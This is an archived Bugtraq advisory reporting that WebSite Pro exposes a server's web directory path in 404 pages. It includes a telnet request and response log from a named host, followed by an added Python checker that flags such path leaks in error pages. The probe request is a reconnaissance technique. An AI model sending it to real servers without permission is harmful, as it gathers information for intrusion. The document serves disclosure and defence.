Dear Bugtraqers,

Description:

WebSite Pro is also revealing the webdirectory of each Website by a simple command line.
This bug is similar to the "IIS revealing webdirectories" bug reported on bugtraq.
On WebSitePro the difference is the way you retrieve the path.

Example:

(Made with MS Windows Telnet Client)

Logfile:

-----------------------start-----------------------
GET /HTTP1.0\            <------ Our command we send via Telnet on port 80 to the webserver

Response:

Content-length: 186

<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
<BODY bgcolor="White"><H2>Docume
nt Moved</H2>
This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here
</A>.<P>
</BODY></HTML>
GET /HTTP1.0/
Content-length: 230

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not
 Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(
D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
</BODY></HTML>
------------------------end------------------------

Here it shows us that the HTML files are in D:\WEBROOTS\VHOSTS\aktenet\htdocs.
It's not a large threat, but an attacker might gain information about the server which should stay in Admin's hands. On all Webservers, e.g. MS IIS and Apache, the response is "error 404".

-------cut------
Elias: I have some html in this mail, try to send it as clear text, as it is, please.
Else people with html capable browsers will only get half of the logfile.
Thx :-)
------cut------

-------------------------------
Lark Lizerman

lizermanat_private
-------------------------------
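Added example, not part of the original post: a check an administrator can run over captured error-page bodies to flag the kind of path leak shown in the logfile above. The function names and the clean comparison body are assumptions made for illustration; the leaking body is constructed from the 404 response quoted in the post.

```python
import re
from html import unescape

# Constructed from the 404 body quoted in the post (terminal line wraps kept).
SAMPLE_404 = (
    '<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>\n'
    '<BODY bgcolor="White"><H2>404 Not\n Found</H2>\n'
    'The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(\n'
    'D:\\WEBROOTS\\VHOSTS\\aktenet\\htdocs\\HTTP1.0)</CODE><P>\n'
    '</BODY></HTML>'
)
# Constructed for comparison: a 404 body that names only the requested URL.
CLEAN_404 = (
    '<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY>'
    'The requested URL /HTTP1.0/ was not found on this server.</BODY></HTML>'
)

TAG = re.compile(r'<[^>]+>')
# Drive-letter path (D:\dir\file) or UNC path (\\host\share\dir).
# Path segments containing spaces are cut at the space to avoid swallowing prose.
WIN_PATH = re.compile(r'(?:\b[A-Za-z]:|\\\\[\w.$-]+\\[\w.$-]+)(?:\\[\w.$-]+)+')


def leaked_paths(body):
    """Return absolute Windows paths found in the visible text of an HTML body."""
    text = unescape(TAG.sub(' ', body))
    return [m.group(0) for m in WIN_PATH.finditer(text)]


def exposed_docroot(path, request_url):
    """If the leaked path ends with the request URL mapped to backslashes,
    return the directory prefix (the document root); otherwise None."""
    suffix = request_url.strip('/').replace('/', '\\')
    if suffix and path.lower().endswith('\\' + suffix.lower()):
        return path[: -len(suffix) - 1]
    return None


def audit_error_page(body, request_url):
    """Summarise one error response: leaked paths and any derivable docroot."""
    paths = leaked_paths(body)
    roots = [r for r in (exposed_docroot(p, request_url) for p in paths) if r]
    return {'leak': bool(paths), 'paths': paths, 'docroots': roots}


if __name__ == '__main__':
    print(audit_error_page(SAMPLE_404, '/HTTP1.0/'))
    print(audit_error_page(CLEAN_404, '/HTTP1.0/'))
```

A body that reports a leak means the server's error template echoes the resolved filesystem path; the fix is a custom or vendor-patched error page that names only the URL.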
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:54 PDT